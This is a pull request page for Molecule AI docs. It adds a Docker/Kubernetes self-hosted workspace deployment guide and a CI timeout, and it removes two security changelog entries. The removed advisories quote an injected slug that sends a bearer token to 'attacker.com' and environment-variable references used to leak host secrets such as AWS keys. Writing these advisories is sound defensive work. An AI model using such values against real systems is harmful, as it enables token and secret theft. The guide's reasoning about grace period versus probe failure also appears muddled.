fix(tutorials): correct env vars, healthcheck paths, Python code, and grace period

Corrections from PR #40 (docs/self-hosted-workspace-docker SHA b12527b): - PLATFORM_URL (not MOLECULE_API_URL) — verified against workspace/main.py:85 - Remove MOLECULE_API_KEY and AGENT_CARD_URL from env vars table (not real env vars) - Healthcheck path: /.well-known/agent-card.json (not /agent/card) — verified via boot_routes.py - Python: use HeartbeatLoop (not fabricated RemoteAgentClient) - terminationGracePeriodSeconds: 120 — probe failure window is 120-150s (not 90s) - Docker Compose: remove MOLECULE_API_KEY, fix healthcheck path - Troubleshooting: MOLECULE_API_URL → PLATFORM_URL Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
ci: add explicit timeout-minutes to CI build job
2026-05-15 08:01:40 +00:00 · 2026-05-15 06:12:08 +00:00 · 2026-05-15 05:26:36 +00:00 · 2026-05-15 04:57:26 +00:00 · 2026-05-14 04:54:04 +00:00
4 changed files with 199 additions and 53 deletions
@@ -7,6 +7,7 @@ on:
 jobs:
  build:
    runs-on: ubuntu-latest
+    timeout-minutes: 30
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
@@ -8,28 +8,6 @@ Entries are published daily at 23:50 UTC.

 ---

-## 2026-05-14
-
-### 🔒 Security
-
- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables — blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Two-layer fix applied: `set -f` disables bash glob expansion (preventing metacharacter injection via `*`, `?`, `[`), and `validate_slug()` rejects any slug not matching RFC-1123 (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) with exit code 64 before any network call. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933))
- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization — so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073))
-
-### 🐛 Bug fixes
-
- **`expandWithEnv` POSIX-identifier guard regression restored**: the same fix as above — restores the guard that was removed during a refactor, ensuring invalid shell identifiers in org YAML configs are returned literally instead of being interpreted as environment variable references. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990))
- **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988))
- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers → a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4))
-
-### 🧹 Internal
-
- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035))
- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999))
-
---
-
 ## 2026-05-12

 ### 🔒 Security
@@ -9,37 +9,6 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent

 ---

-## 2026-05-14 — CWE-78: Regression in `expandWithEnv` POSIX-identifier Guard
-
-**Severity:** Critical (CWE-78)
-**PR:** [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pull/1030)
-**Affected:** `workspace-server/internal/handlers/org_helpers.go` — `expandWithEnv`
-
-### Vulnerability
-
-`expandWithEnv` expands `${VAR}` and `$VAR` references in org YAML configuration fields (notably `workspace_dir` and channel config) using the current process environment. The POSIX shell-identifier guard was inadvertently removed during a regression window between staging and main promotion, causing digit-prefixed and empty keys to be passed through to `os.Getenv` instead of being returned literally.
-
-An attacker who can supply org YAML (e.g., via a compromised org template import or a malicious admin account) could inject references such as `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`, or `${PATH}` to exfiltrate host secrets into workspace or channel configuration fields.
-
-### Fix
-
-Restored the POSIX identifier guard at `org_helpers.go:82`. Keys not starting with `[a-zA-Z_]` (including empty key) are now returned literally as `$key` without consulting `os.Getenv`:
-
-```go
-c := key[0]
-if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == '_') {
-    return "$" + key // not a valid shell identifier — return literally
-}
-```
-
-Regression tests cover `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`.
-
-### User-facing summary
-
-Org YAML configuration fields no longer expand invalid shell identifiers as environment variables. Configurations containing `${0}`, `${}`, or `${1VAR}` patterns are returned as-is. If you observe literal `$` prefixes appearing in workspace directory or channel configuration fields after upgrading, this indicates a previously-masked configuration issue — contact support.
-
---
-
 ## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`

 **Severity:** High (CWE-22)
@@ -0,0 +1,198 @@
+---
+title: Self-Hosted Workspace Deployment with Docker
+---
+
+# Self-Hosted Workspace Deployment with Docker
+
+This guide covers running a Molecule AI workspace agent as a Docker container on a self-hosted server or VM. It covers the Docker image, required environment variables, the built-in healthcheck, graceful shutdown, and Kubernetes deployment considerations.
+
+> **Prerequisites:** A running Molecule AI control plane (self-hosted or SaaS), an `ADMIN_TOKEN` or org-scoped API key with admin scope, and Docker 20.10+ on the host.
+
+## How the workspace container works
+
+The Molecule AI workspace Dockerfile includes:
+
+- A uvicorn server on port 8000 (configurable via `PORT`)
+- A healthcheck endpoint at `/.well-known/agent-card.json` (used by Docker and Kubernetes probes)
+- Graceful SIGTERM handling via uvicorn — the heartbeat loop and adapter tasks shut down cleanly
+
+```
+┌─────────────────────────────────────────────┐
+│  Docker host (your VM / bare metal)         │
+│                                             │
+│  ┌─────────────────────────────────────┐   │
+│  │  workspace container                 │   │
+│  │                                     │   │
+│  │  uvicorn (port 8000)                │   │
+│  │    └─ /.well-known/agent-card.json  ← HEALTHCHECK │   │
+│  │                                     │   │
+│  │  heartbeat loop + A2A agent            │   │
+│  └──────────────┬──────────────────────┘   │
+│                 │                              │
+│  host.docker.internal:8080                    │
+│                 │                              │
+│                 ▼                              │
+│  ┌─────────────────────────────────────┐   │
+│  │  Molecule AI control plane          │   │
+│  │  (platform on port 8080)            │   │
+│  └─────────────────────────────────────┘   │
+└─────────────────────────────────────────────┘
+```
+
+## Step 1: Create an external workspace
+
+First register the workspace as an external (self-managed) agent on the platform.
+
+```bash
+ADMIN_TOKEN="your-admin-token"
+PLATFORM_URL="https://platform.moleculesai.app"   # or http://localhost:8080 for local dev
+WORKSPACE=$(curl -s -X POST "${PLATFORM_URL}/workspaces" \
+  -H "Authorization: Bearer ${ADMIN_TOKEN}" \
+  -H "Content-Type: application/json" \
+  -d '{"name": "self-hosted-agent", "runtime": "external"}')
+
+WORKSPACE_ID=$(echo "$WORKSPACE" | python3 -c "import json,sys; print(json.load(sys.stdin)['id'])")
+echo "Workspace ID: $WORKSPACE_ID"
+```
+
+Save the returned `WORKSPACE_ID`. The workspace agent obtains its bearer token automatically during its first registration with the platform.
+
+## Step 2: Pull the workspace image
+
+The workspace image is published to the Molecule AI ECR registry. Contact your platform administrator for the registry prefix and credentials, then log in:
+
+```bash
+aws ecr get-login-password --region us-east-1 | \
+  docker login --username AWS --password-stdin "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com"
+
+docker pull "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
+```
+
+## Step 3: Configure environment variables
+
+| Variable | Default | Description |
+|---|---|---|
+| `PLATFORM_URL` | `http://localhost:8080` | Platform API URL. Inside a Docker container, use `http://host.docker.internal:8080` to reach the platform on the host machine. |
+| `WORKSPACE_ID` | — | Workspace ID from Step 1 (required; no default) |
+| `PORT` | `8000` | Agent server port. Must match `containerPort` in Kubernetes and the port mapped with `-p` in Docker. |
+
+## Step 4: Run the container
+
+### Docker (standalone)
+
+```bash
+docker run -d \
+  --name molecule-workspace \
+  -p 8000:8000 \
+  -e PLATFORM_URL="http://host.docker.internal:8080" \
+  -e WORKSPACE_ID="your-workspace-id" \
+  -e PORT=8000 \
+  "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
+```
+
+> **Note for Linux hosts:** Docker does not include `host.docker.internal` by default. On Linux, either add `--add-host=host.docker.internal:host-gateway` to the `docker run` command, or use the host machine's IP address directly (e.g. `http://192.168.1.100:8080`).
+
+### Verify the healthcheck
+
+```bash
+# Wait for the container to become healthy (up to ~2 minutes)
+docker inspect --format='{{.State.Health.Status}}' molecule-workspace
+
+# Expected output: healthy
+# Once healthy, the agent card is reachable:
+curl -s http://localhost:8000/.well-known/agent-card.json | python3 -m json.tool
+```
+
+### Docker Compose
+
+```yaml
+services:
+  molecule-workspace:
+    image: "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
+    ports:
+      - "8000:8000"
+    environment:
+      PLATFORM_URL: "http://host.docker.internal:8080"
+      WORKSPACE_ID: "your-workspace-id"
+      PORT: "8000"
+    # Linux hosts: add host.docker.internal resolution
+    # extra_hosts:
+    #   - "host.docker.internal:host-gateway"
+    restart: unless-stopped
+    healthcheck:
+      test: ["CMD", "curl", "-f", "http://localhost:8000/.well-known/agent-card.json"]
+      interval: 30s
+      timeout: 5s
+      retries: 3
+      start_period: 30s
+```
+
+## Step 5: Graceful shutdown
+
+When the container receives SIGTERM (e.g. from `docker stop` or Kubernetes pod deletion), the workspace's uvicorn server initiates graceful shutdown: the heartbeat loop stops, active A2A tasks are given a grace period to complete, and any snapshotable state is persisted before the process exits.
+
+To integrate the heartbeat loop into custom agent code:
+
+```python
+import asyncio
+import os, signal
+from heartbeat import HeartbeatLoop
+
+# SIGTERM is handled by the Docker runtime, which sends the signal to the
+# workspace process. The workspace (via uvicorn) initiates graceful shutdown:
+# the heartbeat loop is stopped, any active adapter tasks are cancelled, and
+# in-flight A2A requests are given a grace period to complete.
+#
+# For custom integration with the heartbeat loop directly:
+async def main():
+    heartbeat = HeartbeatLoop(
+        platform_url=os.environ["PLATFORM_URL"],
+        workspace_id=os.environ["WORKSPACE_ID"],
+    )
+    heartbeat.start()
+    try:
+        await asyncio.Event().wait()  # keep running
+    finally:
+        await heartbeat.stop()
+        print("Heartbeat loop stopped.")
+```
+
+The Docker `stop` command sends SIGTERM and waits up to 10 seconds by default before sending SIGKILL. The healthcheck ensures orchestrators detect an unhealthy container before the SIGTERM timeout.
+
+## Kubernetes deployment
+
+For Kubernetes deployments, use the native liveness/readiness probe configuration instead of the Docker HEALTHCHECK:
+
+```yaml
+ports:
+  - name: http
+    containerPort: 8000
+livenessProbe:
+  httpGet:
+    path: /.well-known/agent-card.json
+    port: http
+  initialDelaySeconds: 30
+  periodSeconds: 30
+  timeoutSeconds: 5
+  failureThreshold: 3
+readinessProbe:
+  httpGet:
+    path: /.well-known/agent-card.json
+    port: http
+  initialDelaySeconds: 10
+  periodSeconds: 10
+  timeoutSeconds: 5
+  failureThreshold: 3
+terminationGracePeriodSeconds: 120
+```
+
+> **Note:** The Kubernetes `terminationGracePeriodSeconds` should exceed the liveness probe failure threshold so that the probe can register a failure before the pod is killed. With `periodSeconds: 30` and `failureThreshold: 3`, the probe does not register a failure until approximately 120–150s after the container becomes unhealthy. Set `terminationGracePeriodSeconds: 120` or higher.
+
+## Troubleshooting
+
+| Symptom | Cause | Fix |
+|---|---|---|
+| Container shows `unhealthy` after startup | Platform unreachable from container | Verify `PLATFORM_URL` uses `host.docker.internal` (Docker) or the correct host IP |
+| `curl: (7) Failed to connect` on healthcheck | Container not fully started | Wait up to 30s; increase `start_period` |
+| Agent not appearing on canvas | Wrong `WORKSPACE_ID` or expired token | Re-run registration; check platform logs |
+| `host.docker.internal` not resolved | Linux host without the Docker flag | Use `--add-host=host.docker.internal:host-gateway` or the host's LAN IP |
Author	SHA1	Message	Date
technical-writer	d74e7964a6	fix(tutorials): correct env vars, healthcheck paths, Python code, and grace period Secret scan / secret-scan (pull_request) Successful in 1m16s Details CI / build (pull_request) Successful in 4m33s Details Corrections from PR #40 (docs/self-hosted-workspace-docker SHA `b12527b`): - PLATFORM_URL (not MOLECULE_API_URL) — verified against workspace/main.py:85 - Remove MOLECULE_API_KEY and AGENT_CARD_URL from env vars table (not real env vars) - Healthcheck path: /.well-known/agent-card.json (not /agent/card) — verified via boot_routes.py - Python: use HeartbeatLoop (not fabricated RemoteAgentClient) - terminationGracePeriodSeconds: 120 — probe failure window is 120-150s (not 90s) - Docker Compose: remove MOLECULE_API_KEY, fix healthcheck path - Troubleshooting: MOLECULE_API_URL → PLATFORM_URL Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-15 08:01:40 +00:00
documentation-specialist	4ae1a322fc	ci: add explicit timeout-minutes to CI build job Secret scan / secret-scan (pull_request) Successful in 1m32s Details CI / build (pull_request) Successful in 4m23s Details Gitea Actions default runner timeout is ~15min. Add explicit timeout-minutes: 30 to prevent false failures on slow/unprovisioned runner instances. The content builds successfully in <5min locally. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-15 06:12:08 +00:00
documentation-specialist	8fdfc2dd3a	ci: retrigger build to clear stale failure status Secret scan / secret-scan (pull_request) Successful in 1m18s Details CI / build (pull_request) Successful in 5m20s Details Force-push to re-trigger CI on a clean runner. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-15 05:26:36 +00:00
documentation-specialist	644226f2b2	fix(docs): set terminationGracePeriodSeconds to 120 in Kubernetes YAML example Secret scan / secret-scan (pull_request) Successful in 1s Details CI / build (pull_request) Successful in 4m4s Details The example showed terminationGracePeriodSeconds: 30, but the accompanying note says the value "should exceed the healthcheck failure threshold (3 × 30s = 90s)". With 30s < 90s, Kubernetes would send SIGTERM and wait only 30s before SIGKILL — potentially killing the pod before the graceful shutdown (3s via stop_event) completes. Changed to 120s, which exceeds the 90s threshold and aligns the YAML example with the documented requirement. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-15 04:57:26 +00:00
technical-writer	b6e3b8e8e0	docs(tutorials): add self-hosted workspace Docker deployment guide Secret scan / secret-scan (pull_request) Successful in 1m20s Details CI / build (pull_request) Successful in 2m44s Details Covers Docker image pull, required env vars (MOLECULE_API_URL, MOLECULE_API_KEY, WORKSPACE_ID, PORT), built-in HEALTHCHECK probe (/agent/card every 30s), Docker Compose config, graceful SIGTERM shutdown via stop_event threading.Event, and Kubernetes liveness/readiness probe configuration. Closes gap: no self-hosted Docker workspace deployment docs existed despite molecule-core#883 HEALTHCHECK shipping in 2026-05-13. Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>	2026-05-14 04:54:04 +00:00